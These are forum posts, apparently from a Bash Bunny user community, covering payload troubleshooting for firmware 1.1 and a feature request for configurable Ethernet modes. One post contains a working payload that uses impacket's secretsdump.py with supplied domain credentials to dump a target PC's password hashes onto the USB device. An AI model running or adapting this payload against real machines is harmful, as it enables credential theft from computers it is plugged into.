[LED Control]

Please refer to this document. It includes details on how to use the LED features

https://wiki.bashbunny.com/#!payload_development.md

[firmware 1.1 problem quickcreds]

1 minute ago, mrpmcfc said:

I can ping the machine from the bunny but if I run your script  the TestOutput is empty 

If the script returns blank, make sure that the GET function is in the extension folder of the library folder. 

If it isn't there, then make sure to put the newest repository on the bunny. It should have the extension

[firmware 1.1 problem quickcreds]

can you guys successfully connect to the BB through ssh with the ip 172.16.64.1? If so see if you can ping the IP given to the machine, usually mine is 172.16.64.10. It should show via ifconfig or ipconfig in the respective operating systems if the system is receiving an IP. An example payload of these in action is as follows.

Quote

# System default payload
LED R SLOW
ATTACKMODE RNDIS_ETHERNET
GET TARGET_HOSTNAME
GET TARGET_IP
cd /
if [ ! -d "temp" ]; then
   mkdir temp
fi
echo $TARGET_IP $TARGET_HOSTNAME > /temp/TestOutput

This should create a file at /temp/ named TestOutput. To access it log into the bunny and look for it

Quote

cat /temp/TestOutput

I don't have my bunny at the moment to test the code, but you should be able to see what the payloads see. If you cannot access the bunny, make sure that your computer can correctly see the bunny (ex drivers found)

[[Attackmode Feature Request] Ethernet adapter]

It is a custom payload using impacket at the old firmware location. It assumes that you know the domain/user and password to pull credentials from a PC. If the account is cached, it executes, but if not it fails due to contacting the login server. I have also figured out that the use of an @ or a colon in a password causes issues for the impacket code.

 

Quote

USER=domain/Genericuser
PASS=GenericPassword

LED R SLOW
ATTACKMODE RNDIS_ETHERNET
GET TARGET_HOSTNAME
GET TARGET_IP

#if target does not get an IP give fail LED
if [ -z "${TARGET_IP}" ]; then
    LED R 100
    exit 1
fi

cd /pentest/impacket/examples 

if [ ! -d "temp" ]; then
    mkdir temp
fi

python secretsdump.py $USER:$PASS@$TARGET_IP -outputfile temp/$TARGET_HOSTNAME > temp/$temp/$TARGET_HOSTNAME.outputfile
sync
LED G SLOW

 

[[Attackmode Feature Request] Ethernet adapter]

I understand that part of the plan for the BB was Man in the Middle attacks, which is why I am running into an issue with one of the payloads I am playing around with. In an enterprise environment the system, unless its a laptop, may not cache credentials that you may have obtained. This being said if the user is not currently logged into the machine or has not logged in for a while, the system will attempt to reach out to a log in server. If the BB is the route the system takes to reach the internet, then the computer will throw an error like this 

Quote

"SMB SessionError: STATUS_NO_LOGON_SERVERS(No logon servers are currently available to service the logon request.)"

All of that being said, i think a feature that may be helpful would be to allow for configuration of the Ethernet modes. This would allow you to set the connection to slower than most networks or maybe having no connection to the internet. This would also help when you do not wish to interrupt internet connectivity for the device. 

I cannot say that you cannot configure this already, but I can say I do not know how to configure this and that I am curious as to how I would do this.